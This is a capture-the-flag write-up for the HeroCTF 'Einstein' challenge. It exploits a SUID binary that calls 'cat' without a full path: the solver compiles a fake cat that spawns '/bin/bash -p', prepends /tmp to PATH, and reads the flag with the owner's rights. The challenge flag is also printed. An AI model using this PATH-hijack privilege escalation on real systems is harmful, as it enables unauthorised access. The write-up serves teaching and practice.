Writeup - Einstein
Difficulty : very easy
Statement
- The laws of physics are the same for all observers in any inertial frame of reference relative to one another (principle of relativity).
- The speed of light in vacuum is the same for all observers, regardless of their relative motion or of the motion of the light source.
Source : https://en.wikipedia.org/wiki/Theory_of_relativity
Credentials : user:password
Deploy on deploy.heroctf.fr
Format : Hero{flag}
Author : Log_s
Solve
We notice a SUID bit on the learn binary. The SUID (Set User ID) permission in Unix/Linux is a special file permission used mainly for executable files. When the SUID bit is set on an executable file, it allows users to execute the file with the permissions of the file’s owner rather than with the permissions of the user running it.
1
2
3
4
5
6
7
8
9
10
|
user@einstein:~$ ls -al
total 44
drwx------ 1 user user 4096 Oct 25 17:37 .
drwxr-xr-x 1 root root 4096 Oct 25 17:37 ..
lrwxrwxrwx 1 root root 9 Oct 25 17:37 .bash_history -> /dev/null
-rw-r--r-- 1 user user 220 Oct 25 17:37 .bash_logout
-rw-r--r-- 1 user user 3526 Oct 25 17:37 .bashrc
-rw-r--r-- 1 user user 807 Oct 25 17:37 .profile
-rwsr-sr-x 1 einstein einstein 16160 Oct 25 17:37 learn
-rw-r--r-- 1 einstein einstein 679 Oct 25 17:35 learn.c
|
Let’s look at the source code of it :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
user@einstein:~$ cat learn.c
#include <stdio.h>
#include <unistd.h>
int main() {
// Welcome message
printf("Welcome to this physics course! All information on this course is not copied from the internet without fact check and is completely riginal.\n");
printf("\n===================================\n\n");
// Execute cat command
setreuid(geteuid(), geteuid()); // Because system() runs sh that resets euid to uid if they don't match
// Otherwise we could not read /home/einstein/theory.txt
char command[30] = "cat /home/einstein/theory.txt";
if (system(command) == -1) {
perror("system");
return 1;
}
return 0;
|
we can see that the cat command is used. The goal is to write a piece of C code that would give us a shell with the rights of the user einstein.
1
2
3
4
5
6
7
8
9
10
11
|
echo '#include <stdlib.h>
#include <unistd.h>
void get_shell() {
setreuid(geteuid(), geteuid());
system("/bin/bash -p");
}
int main() {
get_shell();
return 0;
}' > cat.c
|
We name the binary cat and we modify our path so that our cat binary is used before the legitim one.
1
2
|
user@einstein:~$ gcc cat.c -o /tmp/cat
user@einstein:~$ export PATH=/tmp:$PATH
|
We launch the binary and we have our shell :
1
2
3
4
5
6
7
8
|
user@einstein:~$ ./learn
Welcome to this physics course! All information on this course is not copied from the internet without fact check and is completely riginal.
===================================
bash: /home/user/.bashrc: Permission denied
einstein@einstein:~$ id
uid=1001(einstein) gid=1000(user) groups=1000(user),100(users)
|
1
2
|
user@einstein:~$ /bin/cat /home/einstein/flag.txt
Hero{th30ry_of_r3l4tiv3_p4th5}
|
Flag : Hero{th30ry_of_r3l4tiv3_p4th5}
